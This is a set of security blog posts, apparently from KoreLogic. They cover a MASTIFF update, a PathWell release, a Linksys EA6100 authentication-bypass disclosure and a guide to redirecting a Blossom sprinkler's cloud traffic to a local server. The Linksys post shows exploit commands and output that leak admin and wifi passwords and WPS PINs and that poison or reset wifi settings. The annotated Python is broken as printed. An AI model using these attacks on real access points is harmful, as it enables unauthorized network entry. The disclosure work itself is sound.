Previously, MASTIFF had two types of plug-ins: category plug-ins, that determine the type of file that was being analyzed; and analysis plug-ins, the code that extracts and interprets the information from the file. Any output generated from MASTIFF plug-ins had to be handled by the plug-in itself. This led to multiple problems.

  • Output handling code was being replicated in all of the plug-ins.
  • There was no consistency with how output was formatted.
  • If a new output format was desired, such as HTML, each plug-in had to be updated to handle that new format.

Thus output plug-ins were born. Output plug-ins take the data generated from the analysis plug-ins and place them in a specific output format. In other words, the text output plug-in will place the data into text files, the HTML output plug-in (forthcoming) will format the data into HTML files, etc. This allows the analysis plug-ins to focus solely on performing analysis, and allows new output formats to be quickly added to the framework.

However, a consistent format to place the data into was needed for the output plug-ins to parse and format the data properly. Unfortunately, standard formats such as JSON did not do everything that was required. So, a new "universal" format was created for MASTIFF. This format places analysis plug-in data into what we've termed tables and pages.

The majority of the data extracted by analysis plug-ins can be abstracted into one or more tables of data. For example, the embedded strings plug-in structures data into one table. Each row of the table is the information related to a specific extracted string in the file, and each column is that data field (e.g. location, type, and the string itself).

MASTIFF uses this to its advantage by storing all data in a table-like structure (known oddly enough as a table). Each table contains a header, which describes the data in the table; and multiple rows, which contain the data.

Plug-ins may also generate multiple pieces of information that each need to be stored in their own tables, but still grouped together. Another data structure, known as a page, was created to group multiple tables from a single plug-in together.

Combined, each analysis plug-in output is stored in its own page. Within each page are one of more tables of data. Output plug-ins read each plug-in's page and go through each table, formatting the data within to the format required.

There are advantages to using the universal format outside of the output plug-ins. First, it is now possible to create plug-ins that add to or modify data from other plug-ins. For example, a plug-in that generates a new hash based on a file type does not need to place its data (i.e. a single hash) into its own data structure; it can add its hash to the File Info page data, which already contains all of the hashes. Second, plug-ins can now examine the data from other plug-ins to perform correlation on it. This allows MASTIFF to be extended even further.

From this point forward, all new analysis plug-ins will utilize the output plug-in data structures to take advantage of output plug-ins. We are working on converting all current plug-ins to use output plug-ins. The details on how to use output plug-ins, and create new ones, are contained within the MASTIFF documentation. The analysis plug-in skeleton files, used to quickly generate new plug-ins, have also been updated to utilize output plug-ins.

Currently, there are only two output plug-ins available: raw, which displays the data structures in their raw format (useful for debugging); and text, which puts the data into text files. Additional output plug-ins, including JSON and HTML, will be forthcoming.

MASTIFF Online Plug-in

One last update. We also recently pushed a new plug-in that will submit files to MASTIFF Online Free from MASTIFF if enabled. MASTIFF Online is the service that allows anyone to upload samples and have them analyzed by MASTIFF. The benefit to using MASTIFF Online, instead of a local install of MASTIFF, is that one does not need to worry about keeping MASTIFF up to date or if all of the dependencies are installed.

The plug-in will upload the sample to MASTIFF Online, if the submit option is set to on, and will return the URL where the results may be found.

There are two benefits to using this plug-in. First, it helps increase the size of the MASTIFF Online repository of malware, which will help create new plug-ins and shape the future of MASTIFF. Second, when malware is uploaded to MASTIFF Online, its fuzzy hash is compared to all other malware in the repository. By uploading your malware, you can go to the site and see if there are any samples similar to the sample you are analyzing. This helps your analysis, and MASTIFF in general.

Do bear in mind that MASTIFF Online Free's database is public, so do not enable this when processing files with confidential or proprietary contents.

LibPathWell 0.6.3 Released

$
0
0

I am pleased to announce that a new release of the Password Topology Histogram Wear-Leveling (PathWell) library and PAM module for dynamic password-strength enforcement is now available for download here.

Version 0.6.3 is an update release of PathWell. Generally, code was cleaned up and refined as necessary. The API remains unchanged, but the library did get a revision bump -- the new version is 1:1:0. The primary goals of this release were to work out the build issues previously encountered for some flavors of Linux and to extend configure/build support to MinGW/MSYS build environments. And while the library along with the associated command line utilities compile cleanly and pass all their unit tests under Windows, setting up that build environment and getting the various dependencies (e.g., GMP, PCRE, SQLite, etc.) to compile involves a number of steps, a few hurdles, and fair amount of determination, so be prepared if you decide to venture down that road. Perhaps that will be the topic of a future blog post. Who knows? ...

Anyway, this will likely be our last release for the 0.6.0 branch as our attention has shifted to the 0.7.0 release, which includes new features and tools. More on that to follow in the coming days, so stay tuned ...

Q: Can I have your password? A: Yes you can.

$
0
0

Hello folks, welcome to the first of a four part blog mini-series on firmware and embedded devices. My name is Matt Bergin and i'll be guiding you through the series. We plan to release each part of the series on the Friday of each week in December. The release of the final part in our series is dependent on our responsible disclosure timeline holding for a finding, but we're pretty confident.

We're going to start slowly and with something simple. Today's tale is about a little access point that tried and tried but just couldn't keep its mouth shut. If it has an IP it'll talk, and what it says you might not like. Though, we tried to make it stop (see the timeline in the advisory), it didn't seem to matter to the manufacturer. So here we are: an 0day to help start your holiday season.

Sincerely,
KoreLogic

Onward and upward!

You can purchase the vulnerable device and download the corresponding firmware here: http://www.linksys.com/us/support-product?pid=01t80000003cVuwAAE

We'll start off by doing what every other blog on firmware reversing tells you to do: run binwalk. In this case, it will work without any changes and you'll end up with a sub-directory containing the files you're going to want. If you would rather work off of a live system, JTAG pins are on the board and the console can be found with your baudrate set to 115200.

# ls
bin  etc   JNAP  libexec  mnt  proc  sbin  tmp  var
dev  home  lib   linuxrc  opt  root  sys   usr  www
# cd www
# ls
bootloader_info.cgi     incoming_log.txt        security_log.txt
cgi-bin                 jcgi                    speedtest_info.cgi
dhcp_log.txt            JNAP                    sysinfo.cgi
ezwifi_cfg.cgi          license.pdf             ui
get_counter_info.cgi    outgoing_log.txt        usbinfo.cgi
getstinfo.cgi           qos_info.cgi

There are a many CGI files of interest, I will only talk about a few.

# ls -la sysinfo.cgi
lrwxrwxrwx 1 root root 23 Jul 21  2014 sysinfo.cgi -> /www/ui/cgi/sysinfo.cgi
# ls -la getstinfo.cgi
lrwxrwxrwx 1 root root 23 Jul 21  2014 sysinfo.cgi -> /www/ui/cgi/getstinfo.cgi
# ls -la sysinfo.cgi
lrwxrwxrwx 1 root root 23 Jul 21  2014 ezwifi_cfg.cgi -> /www/ui/cgi/ezwifi_cfg.cgi

These files are accessible from an unauthenticated perspective and allow the pentester to perform a variety of actions. A pentesting team with one person who is simultaneously conducting attacks from an already established network location and a geographically separate person oriented near the access point who desires access to the affected network could then use attacks like this to their advantage. This approach will reduce the need for internet facing assets whose use may compromise the engagement while allowing for a higher degree of persistency and anonymity. These attacks are a good example of why enterprise-grade wireless security is so important.

$ python kl-linksys-ea6100-auth-bypass.py --help
Brought to you by Level at KoreLogic

Usage: kl-linksys-ea6100-auth-bypass.py [options]

Options:
  -h, --help    show this help message and exit
  --host=HOST   Target IP address
  --sysinfo     Get target system information
  --getpwhash   Get target wireless password hash
  --getclearpw  Get target wireless SSID and cleartext password
  --isdefault   Check if target is running the default admin credential (if
                yes, obtain passphrase)
  --resetwifi   Reset the access point security (requires default passphrase)
  --poisonwifi  Poison the access point security settings
  --getwpspin   Get the WPS pin for the target

The switches above and their corresponding description convey the functionality built into our exploit.

The first is --isdefault which works by sending the access point management interface a JNAP action over HTTP. The JNAP functionality within the EA series access points has been discussed previously; see for example https://github.com/Qanan/Linksys-JNAP-Siphon

This tool does indeed siphon out some interesting information, even information that is redundant to what we obtain through separate methods. While it used to be quite popular for the default admin account in these types of devices to just be admin/admin we found that is no longer the case for the EA series. Instead we found a (seemingly) random password on the label for our hardware. We didn't look, but lets just hope it isn't based on the serial number of the device or any other predicatable value really.

So, what does --isdefault do? It sends an HTTP request to the access point with a header name X-JNAP-Action whose value is a URL.

Example: http://linksys.com/jnap/core/IsAdminPasswordDefault

The access point will return an HTTP 200 with a JSON string. The string contains a key named 'output' which also contains a JSON value. This value has a key named 'isAdminPasswordDefault' and contains a boolean indicating whether or not the password has been changed.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --isdefault
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Checking if administrator passphrase is default -
[!] Passphrase is not default

I changed the password, but what if I had not yet changed it? I mean, it's not admin/admin anymore so I should good right? Wrong. The access point will tell _anyone_ the default admin password regardless if it's set or not. In cases where isAdminPasswordDefault is True, the exploit will obtain the default password in clear text. You'll see this in action later on.

What about getting access to the wireless network? Well, there are a few options. If you don't mind cracking hashes then --getpwhash will make an HTTP call to the access point at getstinfo.cgi which will then return the values shown below.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getpwhash
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Obtaining wireless password hash -
    SSID=[redacted]
    Passphrase=[redacted]

What if you want to use WPS instead? No problem, just run --getwpspin. This makes an HTTP call to sysinfo.cgi and then parses the response for the value.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getwpspin
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Getting WPS pin -
        WPS PIN: [redacted]

If you don't want to use any of those or maybe you just want the WPA2 password, you can use --getclearpw. This also makes a HTTP call to sysinfo.cgi, except this will search for the wireless security settings which are stored in cleartext.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getclearpw
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Obtaining wireless ssid and password -
        wl0 Passphrase: [redacted]
        wl0 SSID: [redacted]
        wl1 Passphrase: [redacted]
        wl1 SSID: [redacted]

If you're looking for a "poison the well" type attack, then --poisonwifi is for you. This switch makes an HTTP call that will reconfigure NVRAM so the next time a change is applied your poisoned wireless settings will also get applied. Once the HTTP call to poison the settings has taken place, the exploit will call --getclearpw and search for your poisoned settings to ensure poisoning has taken place.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --poisonwifi
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Poisoning wireless ssid configuration
[+] Access point ssid settings poisoned. An administrator will need to hit Apply anywhere in the UI

Say stealth doesn't matter and this attack vector is still your best shot for some reason, if --isdefault is True the exploit can automatically reconfigure the wireless settings for quick network access. Using the switch --resetwifi will run --isdefault and if it returns True, it will then run a separate JNAP action that will perform the reconfiguration.

$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --resetwifi
Brought to you by Level at KoreLogic

[+] Target host is alive, proceeding.
[+] Resetting the access point security
[+] Admin password is default, asking for the password
[+] Got the passphrase: [redacted]
[+] AP will now restart with the SSID and passphrase: korelogic/korelogic and korelogic2/korelogic2

I hope you enjoyed reading this blog. Next week we will talk about a cloud-based smart lawn watering solution and how to retain cool functionality in smart gadgets while removing third-party access to your network. Cheers!

Unplugging An IoT Device From The Cloud

$
0
0

Hello again and welcome back. This is part two in our four-part series on firmware and embedded devices. Today, I will be discussing home automation and the Internet of Things (IoT). More specifically, I'll be talking about Blossom. Blossom is a cloud-based smart lawn watering system that will 'automatically' water your lawn. Normally, our goal is to break into the target device so I may inspect running processes and resident binaries to ensure they are not designed to work in ways that are counter to our interests. Today, I won't be doing that. Instead, I am going to observe the functionality of the device and how it interacts with the manufacturers cloud-based API. Then, I'll force network traffic redirection from the device to a server I control. Finally, I will recreate a bare minimum copy of the manufacturer's API available internally so that the device will no longer require internet access for a somewhat normal operation.

What does this mean? I am going to write an application to water my lawn, when I want my lawn watered. Why? Because I like the functionality of smart-enabled devices, but I do not like adding network potential pivot points anywhere on my networks. My hope is that this part in our series serves as a soft introduction into the thought process I typically use when removing an unwanted third-party from my networks or even attempting to attack the underlying software of a target device.

So, how does the Blossom work? The first thing Blossom asks you to do is move your wiring over to the new system, but I won't cover that. Once you power it up, Blossom will start an Access Point that you can connect to. The access point will be named as such: Blossom-XXXX where 'X' is a four digit number. Once you install the corresponding phone app, it wants you to create an account and input some information about the geographic location where the system resides. In retrospect, since I don't care about managing my lawn settings while say ... traveling or while being down the street at a friends, creating an account and providing said information may be irrelevant. There is also an HTTP portal and API which does not require any of that information.

The wireless password for every Blossom unit is '12flowers'. Once connected to the Blossom access point, you should visit the default web portal (http://192.168.10.1). The latest Blossom firmware will disable the access point after setup, but it will also disable the web portal and API I use. My advice is to not update the firmware. However, a bug in the older firmware exists where the access point does not get torn down after setup. This was a concern to me as a separate wireless adapter on the Blossom also exists, which is connected to an internet routable network. A security issue in the Blossom web application or WSGI API could result in another easy pivot point. Fortunately, after emailing Blossom's support group they agreed to provide me with a firmware build that would disable the access point while retaining the web server and API. I wish other vendors would be as responsive to my requests. Bravo Blossom!

Here you can configure a few things within the Blossom. The four main sections within the UI are named: Provisioning, System Info, Advanced, and Blossom. Provisioning allows you to connect Blossom to your wireless access point. System Info displays basic network adapter and operating system information. Advanced allows the wireless access point settings to be changed, firmware to be upgraded, the device can be rebooted, and reset to the factory issued state. The Blossom section allows the user to change the 'Server Group' between Live, Staging, and Test. I haven't tested to see if changing this value alters system settings such as running services.

POST /sys/network HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://[redacted]/
Content-Length: 175
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"ssid":"korelogicwashere","security":4,"key":"sillyfuntimes","ip":0,"ipaddr":"192.168.2.2","ipmask":"255.255.255.0","ipgw":"192.168.2.1","ipdns1":"0.0.0.0","ipdns2":"0.0.0.0"}

They've tried to hide some non-critical things, but it doesn't seem like they put a lot of effort into it. For example, you can open and close valves artibrarily and also change the LED colors! Their method of hiding the functionality was to comment out the associated javascript which displays that part of the UI. They didn't actually remove the underlying functionality. So if you just view source:

Example requests for those looked like:

For the LED:

POST /bloom/led_custom HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://[redacted]/
Content-Length: 76
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"type":1,"r1":90,"g1":10,"b1":0,"r2":20,"g2":20,"b2":30,"t1":500,"t2":1000}

For valve control:

POST /bloom/valve HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://[redacted]/
Content-Length: 24
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"valve":1,"inverter":1}

At this point, my dest device is sitting on a rooted Linksys WRT54GL wireless network. Inspecting the traffic is trivial from this position within the network. Even more favorably, there is no encryption between the device and the cloud-based API. As far as the type of information within the network traffic, it's mostly non-sensitive information pertaining to watering schedules, current weather information, etc. However, it does also contain the approximate GPS coordinates and physical address for the device. In my opinion, this traffic probably should be encrypted. I used fake information but have redacted the data shown here so as to not implicate unaffiliated third parties. You know ...just in case.

HTTP/1.1 200 OK
Allow: GET, POST, PUT, PATCH, HEAD, OPTIONS
Content-Type: application/json
Date: Thu, 19 Nov 2015 22:58:38 GMT
Vary: Accept
transfer-encoding: chunked
Connection: keep-alive

{"latitude": [redacted], "longitude": [redacted], "zones": [{"id": 44318, "name": "Zone 1", "plant_type": 1,
 "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 1, "active": true,
 "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null,
 "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75},
 {"id": 44319, "name": "Zone 2", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 2, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44320, "name": "Zone 3",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 3,
 "active": true, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44321, "name": "Zone 4", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 4, "active": false, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44322, "name": "Zone 5",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 5,
 "active": false, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44323, "name": "Zone 6", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 6, "active": false, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44324, "name": "Zone 7",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 7,
 "active": false, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44325, "name": "Zone 8", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 8, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44326, "name": "Zone 9",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 9,
 "active": true, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44327, "name": "Zone 10", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 10, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}, {"id": 44328, "name": "Zone 11",
 "plant_type": 1, "emitter_type": 5, "gets_rainfall": true, "user_watering_modulation": 1.0, "valve": 11,
 "active": true, "illustration": null, "thumbnail_1": null, "thumbnail_2": null, "thumbnail_3": null,
 "thumbnail_4": null, "schedule_manual_secs": 180, "auto_scheduling": true, "precipitation_rate": 16.51,
 "kc": 0.75}, {"id": 44329, "name": "Zone 12", "plant_type": 1, "emitter_type": 5, "gets_rainfall": true,
 "user_watering_modulation": 1.0, "valve": 12, "active": true, "illustration": null, "thumbnail_1": null,
 "thumbnail_2": null, "thumbnail_3": null, "thumbnail_4": null, "schedule_manual_secs": 180,
 "auto_scheduling": true, "precipitation_rate": 16.51, "kc": 0.75}], "channel": "channel_[redacted]",
 "sch_start": "+60", "address": {"city": "[redacted]", "country": "[redacted]", "street2": null,
 "zipcode": "[redacted]", "state": "[redacted]", "street": "[redacted]"}, "timezone": "[redacted]",
 "current_time": "2015-11-19T14:58:37.925-08:00", "avg_eto": 1.74}

Anyhow, I am at a cross-road. There are two ways I can go about accomplishing our goal. I got close to making both work, but in the end and for the purpose of this blog, I will only discuss one. The first way, and way I won't go into detail on how to recreate, has code to almost completely rebuild their cloud-based API, including the phone app. The phone app has a button that lets you run the sprinklers arbitrarily. This is why it was my intial target for accomplishing our goal. In the end, that route was taking much more effort than what it would for the route I'll talk about later on. A bit of information on how their cloud architecture works:

I thought it would work kind of like this:

[Phone App] -> [Cloud API] <-> [Blossom]

But really it works something like this:

[Phone App] -> [Blossom API] <-> [Blossom]
                                     ^
                                     |
                  [PubNub API] <-----+

PubNub is a realtime messaging service and content delivery network. The Blossom device makes thousands of HTTP calls per day, which can be difficult to scale and can probably create debugging problems when attempting to triage customer issues. PubNub likely helps with that by integrating code into the device that allows a more granular way of tracking device / user pairing and network state. PubNub returns a job identifer along with an EPOCH time that I believe is correlated to the job scheduled through the phone app.

There are big reasons why you want to remove third-parties from your networks. One such example can be found in the Privacy Policy used by the manufacturer of the Blossom. The manufacturer is owned by a company called iConservo and the policy in full can be found at: http://myblossom.com/legal/iconservo-privacy-statement/

What We Collect

[snip]
We also collect passive information such as your IP address on certain
IConservo Products, your ZIP code, as well as information about your
IConsevo Product such as MAC addresses, product model numbers,
software versions, chipset IDs, and region and language settings.
Passive information also includes information about the products you
request or purchase, the presence of other devices connected to your
local network, and the number of users and frequency of use of
IConservo Products and Services. We also collect passive information
regarding customer activities on our website. Some passive information
may be associated with personally identifying information.  [snip]

Who We Share With

We work with third parties in connection with some aspects of the
ICONSERVO Products and Services, such as but not limited to processing
payments and providing marketing assistance. 
[snip]

I'll just quote this again to make sure it's read: "the presence of other devices connected to your local network".

I will let the readers individually infer what this legal text means in relation to what the Blossom will collect about you and devices on your network.

If you want to retain the cloud-based functionality, null routing PubNub will not be an option as a HTTP response from PubNub is what seems to actually start the watering cycle scheduled through the phone app. There is another way to open and close valves manually through the web portal as well.

Blossom communicates with two internet accessible API servers: *.myblossom.com and *.pubnub.com

How do I take control of the network traffic? Just like a sandnet for malware analysis. Set up DHCP and DNS. Configure DHCP to issue the DNS server along with the lease. Next, configure DNS with records to return internal IP addresses for the aforementioned API servers. Blossom will honor this configuration.

The redacted content contains the local IP address for my Blossom device on the testing network and a pairing code to associate the device to my demo account. A sample of the traffic to *.myblossom.com can be found below.

[redacted] - - [28/Nov/2015 08:21:38] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=p HTTP/1.1" 404 -
[redacted] - - [28/Nov/2015 08:21:53] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=p HTTP/1.1" 404 -
[redacted] - - [28/Nov/2015 08:22:08] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=p HTTP/1.1" 404 -

I noticed that if the device is unable to establish communication with the API servers, it will turn the display LED red indicating connectivity failure and eventually purple indicating the start of an automated recovery process. If connectivity is not restored on the subsequent boot, the recovery process will continue indefinitely.

On to the second option, which is more or less a derivative of the first. I am going to trick the Blossom device into staying online. Next, I'll track our watering schedule and issue commands to open and close each valve I care about. In this way, I will remove the need for both the internet-facing Blossom API and PubNub API while retaining the ability to water my lawn when I want. Ok, here I go.....

Upon boot, the device performs a variety of requests to prepare for operation.

Upon resolution of these names the Blossom will then make three HTTP requests.

[redacted] - - [28/Nov/2015 09:12:46] "GET /firmware-check/0.json?q=0.8.1035&c=[redacted] HTTP/1.1" 404 -
[redacted] - - [28/Nov/2015 09:12:48] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=w HTTP/1.1" 200 -
[redacted] - - [28/Nov/2015 09:12:55] "GET /device/v1/server/ HTTP/1.1" 200 -

The first is a firmware check which seems to occur at every boot and every 3600 seconds thereafter. The frequency of this check can be changed using the ota_freq variable in the do_GET function of the Handler class within the code for this blog post. If the device receives a 404 HTTP responce code, it moves along. The second and third requests are what keep the device online. These requests must receive a properly constructed response. This is easy enough, just follow their JSON format. The request for the firmware returns a 404 HTTP response code with no JSON structure, I'll skip that one.

GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=w HTTP/1.1
Host: home.myblossom.com
User-Agent: WMSDK

HTTP/1.1 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Date: Fri, 20 Nov 2015 15:32:32 GMT
Vary: Accept, Cookie
Content-Length: 88
Connection: keep-alive

{"ts": "2015-11-20T07:32:32.259-08:00", "pst_tz_offset": -8.0, "pst_tz_seconds": -28800}
GET /device/v1/server/ HTTP/1.1
Host: home.myblossom.com
User-Agent: WMSDK

HTTP/1.1 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Date: Fri, 20 Nov 2015 15:32:32 GMT
Vary: Accept, Cookie
Content-Length: 88
Connection: keep-alive

{"ts": "2015-11-20T07:32:41.212-08:00", "pst_tz_offset": -8.0, "pst_tz_seconds": -28800}

You'll know everything is going smoothly when the LED on the front display remains a solid green throughout the duration of device uptime.

How about making the Blossom water what I want and when I want it? I'm glad you asked! A few notes first: If you want to make changes to your watering cycle in the future, you'll have to stop the API and make the those changes in code first. If you want to change the zones to be watered in each cycle, you'll have to stop the API and make the changes in code first. The same thought process can be used for zone watering durations. That's okay though, it keeps the mind limber! Lets get down to it.

The below code is annotated with ^""" blocks; the script is also available without the extra annotations: blossom-py3.py

#!/usr/bin/env python3

"""
First, I need a bunch of imports:
"""

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen
from time import strftime, sleep
from datetime import datetime
from threading import Thread
from json import dumps
from sys import exit

"""
I'll turn off debug, you can enable it later if you want an additional
logging statement.
"""

debug = 0

"""
I'll also create some code to log when valves are opened and closed
and recreate a python 2.7 feature that I needed when trying to quickly
port this over.
"""

def xrange(low,high):
    ''' Recreates the xrange I love from the 2.7 version of Python. '''
    return iter(range(low,high))

def log_it(valve, state):
    ''' Creates a simple log entry for each operation.  '''
    fd = open('blossom.log', 'a+')
    if (state == 1):
	    fd.write("{:s} -> Opened valve: {:s}\n".format(str(strftime("%Y-%m-%dT%H:%M:%S")), str(valve)))
    else:
        fd.write("{:s} -> Closed valve: {:s}\n".format(str(strftime("%Y-%m-%dT%H:%M:%S")), str(valve)))
    fd.close()
    return

"""
I'll need a class to tell Blossom to open and close our desired
valves:
"""

class Blossom:
    ''' Instructs the Blossom to perform a desired operation. '''"""
The IP address of the Blossom device should be put in the self.apiHost
variable.
"""

    def __init__(self):
        ''' Defines a shared variable. '''
        self.apiHost = "[redacted]"  # IP Address of Blossom
        return

"""
To open a valve, I simply send a POST request to the Blossom to
/bloom/valve with a JSON object containing two keys: valve and
inverter.  The valve indicates which zone you want to run, and
inverter is a boolean (either 0 or 1) indicating what state the valve
should be in.
"""

    def open_valve(self, valveNumber):
        ''' Instructs Blossom to open a valve. '''
        request = Request("http://{:s}/bloom/valve".format(str(self.apiHost)), dumps({"valve":valveNumber,"inverter":1}).encode('ascii'))
        fd = urlopen(request)
        return fd.close()

"""
The same goes for closing a valve, only the inverter value has been
changed.
"""

    def close_valve(self, valveNumber):
        ''' Instructs Blossom to close a valve. '''
        request = Request("http://{:s}/bloom/valve".format(str(self.apiHost)), dumps({"valve":valveNumber,"inverter":0}).encode('ascii'))
        fd = urlopen(request)
        return fd.close()


"""
Now I need a class to handle HTTP requests, I'll call it Handler. I
need to define the UUID for our Blossom within this class as well.
"""

class Handler(BaseHTTPRequestHandler):
    ''' Decides how to handle each request. '''"""
A function called do_GET is used to handle each received GET request.
"""

    def do_GET(self):

"""
I do some simple request inspection to decide how to respond. I'll
also set some headers for the response.
"""''' In the case of HTTP GET, the request type of checked and an appropriate response is returned. '''
        uuid = "[redacted]"  # Blossom UUID goes here
        if ("firmware-check" not in self.path):
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.send_header('Vary', 'Accept')
            self.send_header('Connection', 'Close')
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()

"""
This is where the API will decide how to respond based on the received
request.  The self.path variable contains the URI as it was received
by the web server. I use this to determine how to build the proper
response. The self.wfile.write function calls are used to actually
build the response. The response gets delivered to the client upon
return.

The first URI is /device/v1/server/ which is more-or-less a server
ping. The response contains time information.
"""

        if (self.path == '/device/v1/server/'):
            self.wfile.write(str('{"ts": "{:s}", "pst_tz_offset": -8.0, "pst_tz_seconds": -28800}'.format(str(strftime("%Y-%m-%dT%H:%M:%S")))))

"""
The second is /api/device/v1/ and looks for an additional URI value
called parameter.
"""

        elif ("api" in self.path and "device" in self.path and uuid in self.path):

"""
If the URI contains parameters,
"""

            if ("api" in self.path and "parameters" in self.path):
                self.wfile.write(str('{"stats_freq": 3600, "pn_keepalive": 1, "uap_debug": 1, "wave_boost": 1, "ota_freq": 3600, "current_time":"{:s}", "build": 1042, "opn_trip": 40}'.format(str(strftime("%Y-%m-%dT%H:%M:%S")))))

"""
Otherwise,
"""

            else:
                self.wfile.write(str('{"channel": "channel_{:s}", "current_time": "{:s}", "tz_offset": -8.0, "tz_seconds": -28800, "sch_load_time": 24900, "fetch_lead": 3600}'.format(str(uuid), str(strftime("%Y-%m-%dT%H:%M:%S")))))

"""
And finally, our return statement.
"""

        return

"""
Now for some code to manage the watering schedule.
"""

class Monitor:
    ''' Monitors the current datetime and watering schedule.  '''"""
I'll need to define a few variables for use later. The variables
*_scheduleDays indicate what days you want your lawn to be watered.
The variables *_scheduleTimes indicate what time of day you want your
lawn watered. The *_zones variable indicates which zones you want
watered and for how long in seconds you want each valve to be open.
"""

    def __init__(self):
        self.front_scheduleDays = ['Tue', 'Thu', 'Sat']
        self.front_scheduleTimes = [400, 2330]
        self.front_zones = {'zones': [1, 2, 3], 'water_times': [60, 60, 120]}
        self.back_scheduleDays = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri']
        self.back_scheduleTimes = [530, 2355]
        self.back_zones = {'zones': [8, 9, 10, 11, 12], 'water_times': [30, 30, 30, 30, 0]}
